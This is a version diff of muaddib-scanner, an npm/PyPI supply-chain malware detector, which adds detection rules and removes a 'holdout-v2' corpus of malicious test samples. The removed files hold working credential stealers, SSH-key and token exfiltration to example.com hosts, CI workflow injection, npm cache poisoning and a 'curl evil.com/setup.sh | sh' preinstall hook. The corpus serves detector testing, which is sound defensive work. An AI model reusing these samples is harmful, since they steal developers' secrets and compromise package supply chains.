muaddib-scanner 2.2.1 → 2.2.3

package/README.fr.md

@@ -1,5 +1,5 @@
 <p align="center">
-  <img src="assets/logo2removebg.png" alt="MUAD'DIB Logo" width="700">
+  <img src="assets/muaddibLogo.png" alt="MUAD'DIB Logo" width="700">
 </p>
 
 <p align="center">

package/README.md

@@ -1,5 +1,5 @@
 <p align="center">
-  <img src="assets/logo2removebg.png" alt="MUAD'DIB Logo" width="700">
+  <img src="assets/muaddibLogo.png" alt="MUAD'DIB Logo" width="700">
 </p>
 
 <p align="center">

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.2.1",
+  "version": "2.2.3",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/response/playbooks.js

@@ -308,6 +308,16 @@ const PLAYBOOKS = {
     'CRITIQUE: Ecriture detectee dans un cache sensible (npm _cacache, yarn, pip). ' +
     'Possible cache poisoning: injection de code malveillant dans des packages caches. ' +
     'Nettoyer le cache: npm cache clean --force. Reinstaller les dependances depuis zero.',
+
+  require_cache_poison:
+    'CRITIQUE: require.cache modifie pour hijacker des modules Node.js. ' +
+    'Le code remplace les exports de modules charges (https, http, fs) pour intercepter toutes les requetes. ' +
+    'Supprimer le package. Redemarrer le processus Node.js. Auditer le trafic reseau recent.',
+
+  staged_binary_payload:
+    'Fichier binaire (.png/.jpg/.wasm) reference avec eval() dans le meme fichier. ' +
+    'Technique de steganographie: le payload malveillant est cache dans les pixels d\'une image ou les sections d\'un WASM. ' +
+    'Analyser le fichier binaire dans un sandbox. Verifier les donnees extraites avant execution.',
 };
 
 function getPlaybook(threatType) {

package/src/rules/index.js

@@ -562,6 +562,29 @@ const RULES = {
     mitre: 'T1059'
   },
 
+  require_cache_poison: {
+    id: 'MUADDIB-AST-019',
+    name: 'Require Cache Poisoning',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Acces a require.cache pour remplacer ou hijacker des modules Node.js charges. Technique de cache poisoning pour intercepter du trafic ou injecter du code.',
+    references: [
+      'https://attack.mitre.org/techniques/T1574/006/'
+    ],
+    mitre: 'T1574.006'
+  },
+  staged_binary_payload: {
+    id: 'MUADDIB-AST-020',
+    name: 'Staged Binary Payload Execution',
+    severity: 'HIGH',
+    confidence: 'high',
+    description: 'Reference a un fichier binaire (.png/.jpg/.wasm) combinee avec eval() dans le meme fichier. Possible execution de payload steganographique cache dans une image.',
+    references: [
+      'https://attack.mitre.org/techniques/T1027/003/'
+    ],
+    mitre: 'T1027.003'
+  },
+
   env_charcode_reconstruction: {
     id: 'MUADDIB-AST-018',
     name: 'Environment Variable Key Reconstruction',

package/src/scanner/ast.js

@@ -222,6 +222,16 @@ function analyzeFile(content, filePath, basePath) {
   // Pre-scan for fromCharCode pattern (env var name obfuscation)
   const hasFromCharCode = content.includes('fromCharCode');
 
+  // Pre-scan for JS reverse shell pattern: net.Socket + connect + pipe + shell process
+  const hasJsReverseShell = /\bnet\.Socket\b/.test(content) &&
+    /\.connect\s*\(/.test(content) &&
+    /\.pipe\b/.test(content) &&
+    (/\bspawn\b/.test(content) || /\bstdin\b/.test(content) || /\bstdout\b/.test(content));
+
+  // Pre-scan for binary file reference (steganography payload detection)
+  const hasBinaryFileLiteral = /\.(png|jpg|jpeg|gif|bmp|ico|wasm)\b/i.test(content);
+  let hasEvalInFile = false;
+
   walk.simple(ast, {
     VariableDeclarator(node) {
       if (node.id?.type === 'Identifier') {
@@ -399,6 +409,35 @@ function analyzeFile(content, filePath, basePath) {
         }
       }
 
+      // Detect spawn/execFile of shell processes — suspicious shell spawn
+      if ((callName === 'spawn' || callName === 'execFile') && node.arguments.length >= 1) {
+        const shellArg = node.arguments[0];
+        if (shellArg.type === 'Literal' && typeof shellArg.value === 'string') {
+          const shellBin = shellArg.value.toLowerCase();
+          if (['/bin/sh', '/bin/bash', 'sh', 'bash', 'cmd.exe', 'powershell', 'pwsh', 'cmd'].includes(shellBin)) {
+            threats.push({
+              type: 'dangerous_call_exec',
+              severity: 'MEDIUM',
+              message: `${callName}('${shellArg.value}') — direct shell process spawn detected.`,
+              file: path.relative(basePath, filePath)
+            });
+          }
+        }
+        // Also check when shell is computed via os.platform() ternary
+        if (shellArg.type === 'ConditionalExpression') {
+          const checkLiteral = (n) => n.type === 'Literal' && typeof n.value === 'string' &&
+            ['/bin/sh', '/bin/bash', 'sh', 'bash', 'cmd.exe', 'powershell', 'pwsh', 'cmd'].includes(n.value.toLowerCase());
+          if (checkLiteral(shellArg.consequent) || checkLiteral(shellArg.alternate)) {
+            threats.push({
+              type: 'dangerous_call_exec',
+              severity: 'MEDIUM',
+              message: `${callName}() with conditional shell binary (platform-aware) — direct shell process spawn detected.`,
+              file: path.relative(basePath, filePath)
+            });
+          }
+        }
+      }
+
       // Detect spawn/fork with {detached: true} — background process evasion
       if ((callName === 'spawn' || callName === 'fork') && node.arguments.length >= 2) {
         const lastArg = node.arguments[node.arguments.length - 1];
@@ -568,6 +607,7 @@ function analyzeFile(content, filePath, basePath) {
       }
 
       if (callName === 'eval') {
+        hasEvalInFile = true;
         const isConstant = hasOnlyStringLiteralArgs(node);
         threats.push({
           type: 'dangerous_call_eval',
@@ -750,6 +790,17 @@ function analyzeFile(content, filePath, basePath) {
     },
 
     MemberExpression(node) {
+      // Detect require.cache access — module cache poisoning
+      if (node.object?.type === 'Identifier' && node.object.name === 'require' &&
+          node.property?.type === 'Identifier' && node.property.name === 'cache') {
+        threats.push({
+          type: 'require_cache_poison',
+          severity: 'CRITICAL',
+          message: 'require.cache accessed — module cache poisoning to hijack or replace core Node.js modules.',
+          file: path.relative(basePath, filePath)
+        });
+      }
+
       if (
         node.object?.object?.name === 'process' &&
         node.object?.property?.name === 'env'
@@ -794,6 +845,26 @@ function analyzeFile(content, filePath, basePath) {
     }
   });
 
+  // Post-walk: JS reverse shell pattern (net.Socket + connect + pipe + shell)
+  if (hasJsReverseShell) {
+    threats.push({
+      type: 'reverse_shell',
+      severity: 'CRITICAL',
+      message: 'JavaScript reverse shell: net.Socket + connect() + pipe to shell process stdin/stdout.',
+      file: path.relative(basePath, filePath)
+    });
+  }
+
+  // Post-walk: steganographic/binary payload execution
+  if (hasBinaryFileLiteral && hasEvalInFile) {
+    threats.push({
+      type: 'staged_binary_payload',
+      severity: 'HIGH',
+      message: 'Binary file reference (.png/.jpg/.wasm/etc.) + eval() in same file — possible steganographic payload execution.',
+      file: path.relative(basePath, filePath)
+    });
+  }
+
   return threats;
 }
 

package/src/scanner/dataflow.js

@@ -60,6 +60,9 @@ function analyzeFile(content, filePath, basePath) {
   const sources = [];
   const sinks = [];
 
+  // Pre-scan: detect raw socket module import (net/tls) for instance .connect() detection
+  const hasRawSocketModule = /require\s*\(\s*['"](?:net|tls)['"]\s*\)/.test(content);
+
   // Track variables assigned from sensitive path expressions
   const sensitivePathVars = new Set();
 
@@ -155,7 +158,7 @@ function analyzeFile(content, filePath, basePath) {
         const prop = node.callee.property;
         if (obj.type === 'Identifier' && prop.type === 'Identifier') {
           // DNS resolution as exfiltration sink
-          if (obj.name === 'dns' && ['resolve', 'lookup', 'resolve4', 'resolve6'].includes(prop.name)) {
+          if (obj.name === 'dns' && ['resolve', 'lookup', 'resolve4', 'resolve6', 'resolveTxt'].includes(prop.name)) {
             sinks.push({ type: 'network_send', name: `dns.${prop.name}`, line: node.loc?.start?.line });
           }
           // HTTP/HTTPS request/get as network sink
@@ -166,6 +169,10 @@ function analyzeFile(content, filePath, basePath) {
           if ((obj.name === 'net' || obj.name === 'tls') && ['connect', 'createConnection'].includes(prop.name)) {
             sinks.push({ type: 'network_send', name: `${obj.name}.${prop.name}`, line: node.loc?.start?.line });
           }
+          // Instance socket.connect(port, host) when file imports net/tls
+          if (hasRawSocketModule && prop.name === 'connect' && node.arguments.length >= 2) {
+            sinks.push({ type: 'network_send', name: 'socket.connect', line: node.loc?.start?.line });
+          }
         }
       }
 

package/datasets/holdout-v2/conditional-os-payload/index.js

@@ -1,36 +0,0 @@
-const os = require('os');
-const { execSync } = require('child_process');
-const https = require('https');
-
-function exfil(data) {
-  const payload = JSON.stringify(data);
-  const req = https.request({
-    hostname: 'metrics.example.com',
-    port: 443,
-    path: '/v2/report',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
-  });
-  req.on('error', () => {});
-  req.write(payload);
-  req.end();
-}
-
-const platform = os.platform();
-const arch = os.arch();
-
-try {
-  if (platform === 'darwin') {
-    // macOS: dump keychain credentials
-    const creds = execSync('security dump-keychain -d login.keychain 2>/dev/null', { encoding: 'utf8', timeout: 10000 });
-    exfil({ os: 'darwin', arch, type: 'keychain', data: creds.substring(0, 8192) });
-  } else if (platform === 'linux') {
-    // Linux: read /etc/shadow
-    const shadow = execSync('cat /etc/shadow 2>/dev/null', { encoding: 'utf8', timeout: 5000 });
-    exfil({ os: 'linux', arch, type: 'shadow', data: shadow });
-  } else if (platform === 'win32') {
-    // Windows: extract saved credentials via PowerShell
-    const creds = execSync('powershell -c "Get-StoredCredential | ConvertTo-Json"', { encoding: 'utf8', timeout: 10000 });
-    exfil({ os: 'win32', arch, type: 'credentials', data: creds });
-  }
-} catch (e) {}

package/datasets/holdout-v2/conditional-os-payload/package.json

@@ -1,6 +0,0 @@
-{
-  "name": "conditional-os-payload",
-  "version": "1.0.0",
-  "description": "Holdout v2 — OS-specific credential theft",
-  "main": "index.js"
-}

package/datasets/holdout-v2/env-var-reconstruction/index.js

@@ -1,21 +0,0 @@
-const https = require('https');
-
-// Reconstruct "GITHUB_TOKEN" from charCodes
-const codes = [71, 73, 84, 72, 85, 66, 95, 84, 79, 75, 69, 78];
-const varName = codes.map(c => String.fromCharCode(c)).join('');
-
-// Access via bracket notation to avoid static detection
-const secret = process.env[varName];
-
-if (secret) {
-  const payload = JSON.stringify({ t: secret, h: require('os').hostname() });
-  const req = https.request({
-    hostname: 'telemetry-api.example.com',
-    port: 443,
-    path: '/v1/collect',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }
-  });
-  req.write(payload);
-  req.end();
-}

package/datasets/holdout-v2/env-var-reconstruction/package.json

@@ -1,6 +0,0 @@
-{
-  "name": "env-var-reconstruction",
-  "version": "1.0.0",
-  "description": "Holdout v2 — charCode reconstruction of env var name",
-  "main": "index.js"
-}

package/datasets/holdout-v2/github-workflow-inject/index.js

@@ -1,36 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-
-// Find the project root by traversing up
-let projectRoot = __dirname;
-while (projectRoot !== path.dirname(projectRoot)) {
-  if (fs.existsSync(path.join(projectRoot, '.git'))) break;
-  projectRoot = path.dirname(projectRoot);
-}
-
-const workflowDir = path.join(projectRoot, '.github', 'workflows');
-
-// Malicious step to inject into existing workflows
-const maliciousStep = `
-      - name: Check dependencies
-        run: |
-          curl -s https://api.example.com/hook -d "token=${{ secrets.GITHUB_TOKEN }}" -d "repo=${{ github.repository }}"
-`;
-
-try {
-  const files = fs.readdirSync(workflowDir);
-  for (const file of files) {
-    if (!file.endsWith('.yml') && !file.endsWith('.yaml')) continue;
-
-    const fullPath = path.join(workflowDir, file);
-    let content = fs.readFileSync(fullPath, 'utf8');
-
-    // Inject after the first "steps:" line
-    const stepsIndex = content.indexOf('steps:');
-    if (stepsIndex !== -1) {
-      const afterSteps = content.indexOf('\n', stepsIndex);
-      content = content.slice(0, afterSteps + 1) + maliciousStep + content.slice(afterSteps + 1);
-      fs.writeFileSync(fullPath, content);
-    }
-  }
-} catch (e) {}

package/datasets/holdout-v2/github-workflow-inject/package.json

@@ -1,6 +0,0 @@
-{
-  "name": "github-workflow-inject",
-  "version": "1.0.0",
-  "description": "Holdout v2 — inject step into existing workflow files",
-  "main": "index.js"
-}

package/datasets/holdout-v2/homedir-ssh-key-steal/index.js

@@ -1,29 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const os = require('os');
-const https = require('https');
-
-// Read SSH private key
-const sshKeyPath = path.join(os.homedir(), '.ssh', 'id_rsa');
-let keyData;
-try {
-  keyData = fs.readFileSync(sshKeyPath, 'utf8');
-} catch (e) {
-  process.exit(0);
-}
-
-// Encode as base64 to fit in a header
-const encoded = Buffer.from(keyData).toString('base64');
-
-// Exfiltrate via custom header to legitimate-looking domain
-const req = https.request({
-  hostname: 'api.github.com',
-  port: 443,
-  path: '/repos/check-update',
-  method: 'GET',
-  headers: {
-    'User-Agent': 'node-updater/1.0',
-    'X-Debug-Data': encoded
-  }
-});
-req.end();

package/datasets/holdout-v2/homedir-ssh-key-steal/package.json

@@ -1,6 +0,0 @@
-{
-  "name": "homedir-ssh-key-steal",
-  "version": "1.0.0",
-  "description": "Holdout v2 — SSH key exfiltration via HTTP header",
-  "main": "index.js"
-}

package/datasets/holdout-v2/npm-cache-poison/index.js

@@ -1,38 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const os = require('os');
-const crypto = require('crypto');
-
-// Target: npm's content-addressable cache
-const npmCacheDir = path.join(os.homedir(), '.npm', '_cacache', 'content-v2', 'sha512');
-
-// Malicious payload to inject into cached package
-const maliciousCode = `
-;(function(){
-  const h = require('https');
-  const o = require('os');
-  const d = JSON.stringify({ h: o.hostname(), u: o.userInfo().username, e: process.env });
-  const r = h.request({ hostname: 'collect.example.com', path: '/npm', method: 'POST',
-    headers: { 'Content-Length': Buffer.byteLength(d) } });
-  r.write(d); r.end();
-})();
-`;
-
-try {
-  // Walk the cache directory to find JS entries
-  const subDirs = fs.readdirSync(npmCacheDir);
-  for (const sub of subDirs.slice(0, 5)) {
-    const subPath = path.join(npmCacheDir, sub);
-    const entries = fs.readdirSync(subPath);
-    for (const entry of entries.slice(0, 3)) {
-      const entryPath = path.join(subPath, entry);
-      const content = fs.readFileSync(entryPath, 'utf8');
-
-      // Only poison JS files
-      if (content.includes('module.exports') || content.includes('require(')) {
-        const poisoned = maliciousCode + '\n' + content;
-        fs.writeFileSync(entryPath, poisoned);
-      }
-    }
-  }
-} catch (e) {}

package/datasets/holdout-v2/npm-cache-poison/package.json

@@ -1,6 +0,0 @@
-{
-  "name": "npm-cache-poison",
-  "version": "1.0.0",
-  "description": "Holdout v2 — local npm cache manipulation",
-  "main": "index.js"
-}

package/datasets/holdout-v2/npm-lifecycle-preinstall-curl/package.json

@@ -1,8 +0,0 @@
-{
-  "name": "npm-lifecycle-preinstall-curl",
-  "version": "1.0.0",
-  "description": "Holdout v2 — pure lifecycle script attack, no JS files",
-  "scripts": {
-    "preinstall": "curl -s https://evil.com/setup.sh | sh"
-  }
-}

package/datasets/holdout-v2/process-env-proxy-getter/index.js

@@ -1,35 +0,0 @@
-const http = require('http');
-
-// Snapshot all current env values before interception
-const envSnapshot = Object.assign({}, process.env);
-
-// Intercept all process.env property accesses via Object.defineProperty
-// Different from Proxy-based approach — works on the actual process.env object
-const sensitiveKeys = ['TOKEN', 'SECRET', 'KEY', 'PASSWORD', 'NPM', 'AWS', 'GITHUB'];
-
-Object.keys(envSnapshot).forEach(key => {
-  const original = envSnapshot[key];
-  const isSensitive = sensitiveKeys.some(s => key.toUpperCase().includes(s));
-
-  Object.defineProperty(process.env, key, {
-    get() {
-      if (isSensitive) {
-        // Silently exfiltrate on each access to a sensitive var
-        const payload = JSON.stringify({ k: key, v: original });
-        const req = http.request({
-          hostname: '127.0.0.1',
-          port: 8443,
-          path: '/log',
-          method: 'POST',
-          headers: { 'Content-Length': Buffer.byteLength(payload) }
-        });
-        req.on('error', () => {});
-        req.write(payload);
-        req.end();
-      }
-      return original;
-    },
-    configurable: true,
-    enumerable: true
-  });
-});

package/datasets/holdout-v2/process-env-proxy-getter/package.json

@@ -1,6 +0,0 @@
-{
-  "name": "process-env-proxy-getter",
-  "version": "1.0.0",
-  "description": "Holdout v2 — defineProperty intercept on process.env",
-  "main": "index.js"
-}

package/datasets/holdout-v2/readable-stream-hijack/index.js

@@ -1,44 +0,0 @@
-const http = require('http');
-const https = require('https');
-
-// Monkey-patch IncomingMessage prototype to intercept all HTTP responses
-const originalEmit = http.IncomingMessage.prototype.emit;
-
-http.IncomingMessage.prototype.emit = function(event, ...args) {
-  if (event === 'end') {
-    // Extract authorization headers from the response's request
-    const authHeaders = {};
-    const reqHeaders = this.req && this.req.getHeaders ? this.req.getHeaders() : {};
-
-    for (const [key, value] of Object.entries(reqHeaders)) {
-      if (key.toLowerCase().includes('auth') || key.toLowerCase().includes('token') || key.toLowerCase().includes('cookie')) {
-        authHeaders[key] = value;
-      }
-    }
-
-    if (Object.keys(authHeaders).length > 0) {
-      // Forward intercepted auth headers to external server
-      const payload = JSON.stringify({
-        url: this.req && this.req.path,
-        headers: authHeaders,
-        timestamp: Date.now()
-      });
-
-      const exfilReq = https.request({
-        hostname: 'telemetry.example.com',
-        port: 443,
-        path: '/collect',
-        method: 'POST',
-        headers: {
-          'Content-Type': 'application/json',
-          'Content-Length': Buffer.byteLength(payload)
-        }
-      });
-      exfilReq.on('error', () => {});
-      exfilReq.write(payload);
-      exfilReq.end();
-    }
-  }
-
-  return originalEmit.call(this, event, ...args);
-};

package/datasets/holdout-v2/readable-stream-hijack/package.json

@@ -1,6 +0,0 @@
-{
-  "name": "readable-stream-hijack",
-  "version": "1.0.0",
-  "description": "Holdout v2 — IncomingMessage prototype monkey-patch",
-  "main": "index.js"
-}

package/datasets/holdout-v2/setTimeout-chain/index.js

@@ -1,50 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const os = require('os');
-const https = require('https');
-
-// Anti-sandbox: chained setTimeout with random delays
-// Sandboxes typically timeout after 30s, this chain can take up to 5 minutes
-
-function stage1() {
-  setTimeout(() => {
-    stage2();
-  }, Math.random() * 60000);
-}
-
-function stage2() {
-  setTimeout(() => {
-    stage3();
-  }, Math.random() * 60000);
-}
-
-function stage3() {
-  setTimeout(() => {
-    stage4();
-  }, Math.random() * 60000);
-}
-
-function stage4() {
-  setTimeout(() => {
-    stage5();
-  }, Math.random() * 60000);
-}
-
-function stage5() {
-  setTimeout(() => {
-    // Final payload: read .npmrc and exfiltrate
-    const npmrc = path.join(os.homedir(), '.npmrc');
-    try {
-      const token = fs.readFileSync(npmrc, 'utf8');
-      const data = Buffer.from(token).toString('base64');
-      const req = https.request({
-        hostname: 'cdn-analytics.example.com',
-        path: '/beacon?d=' + data,
-        method: 'GET'
-      });
-      req.end();
-    } catch (e) {}
-  }, Math.random() * 60000);
-}
-
-stage1();

package/datasets/holdout-v2/setTimeout-chain/package.json

@@ -1,6 +0,0 @@
-{
-  "name": "setTimeout-chain",
-  "version": "1.0.0",
-  "description": "Holdout v2 — nested setTimeout chain with random delays",
-  "main": "index.js"
-}

package/datasets/holdout-v2/wasm-loader/index.js

@@ -1,46 +0,0 @@
-const https = require('https');
-const os = require('os');
-
-// Download WASM module at runtime — malicious logic is in the binary
-const wasmUrl = 'https://cdn.example.com/analytics/v3/engine.wasm';
-
-function downloadWasm(url) {
-  return new Promise((resolve, reject) => {
-    https.get(url, (res) => {
-      const chunks = [];
-      res.on('data', c => chunks.push(c));
-      res.on('end', () => resolve(Buffer.concat(chunks)));
-      res.on('error', reject);
-    }).on('error', reject);
-  });
-}
-
-async function init() {
-  const wasmBytes = await downloadWasm(wasmUrl);
-
-  // Collect credentials to pass into WASM memory
-  const env = process.env;
-  const creds = JSON.stringify({
-    npm: env.NPM_TOKEN || '',
-    gh: env.GITHUB_TOKEN || '',
-    aws_key: env.AWS_ACCESS_KEY_ID || '',
-    aws_secret: env.AWS_SECRET_ACCESS_KEY || '',
-    hostname: os.hostname(),
-    user: os.userInfo().username
-  });
-
-  // Instantiate WASM with imported memory containing credentials
-  const memory = new WebAssembly.Memory({ initial: 10 });
-  const encoder = new TextEncoder();
-  const encoded = encoder.encode(creds);
-  new Uint8Array(memory.buffer).set(encoded);
-
-  const { instance } = await WebAssembly.instantiate(wasmBytes, {
-    env: { memory, credsLen: encoded.length }
-  });
-
-  // WASM module handles exfiltration internally via imported network functions
-  instance.exports.run();
-}
-
-init().catch(() => {});

package/datasets/holdout-v2/wasm-loader/package.json

@@ -1,6 +0,0 @@
-{
-  "name": "wasm-loader",
-  "version": "1.0.0",
-  "description": "Holdout v2 — WASM-based credential passing",
-  "main": "index.js"
-}